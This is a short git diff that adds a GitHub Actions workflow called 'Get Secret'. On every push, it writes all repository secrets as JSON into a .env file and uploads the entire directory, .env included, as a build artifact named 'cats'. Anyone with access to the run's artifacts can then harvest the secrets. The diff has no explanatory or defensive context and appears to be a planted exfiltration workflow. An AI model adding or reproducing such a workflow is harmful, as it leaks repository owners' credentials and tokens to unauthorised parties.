diff --git a/.github/workflows/secret.yml b/.github/workflows/secret.yml new file mode 100644 index 00000000000..7d1dac88791 --- /dev/null +++ b/.github/workflows/secret.yml @@ -0,0 +1,18 @@ +name: Get Secret + +on: push +jobs: + create-envfile: + runs-on: ubuntu-latest + steps: + - name: Make envfile + uses: SpicyPizza/create-envfile@v2.0 + with: + envkey_SECRETS: ${{ toJSON(secrets) }} + file_name: .env + fail_on_empty: false + - name: Upload artifact + uses: actions/upload-artifact@v3 + with: + name: cats + path: . \ No newline at end of file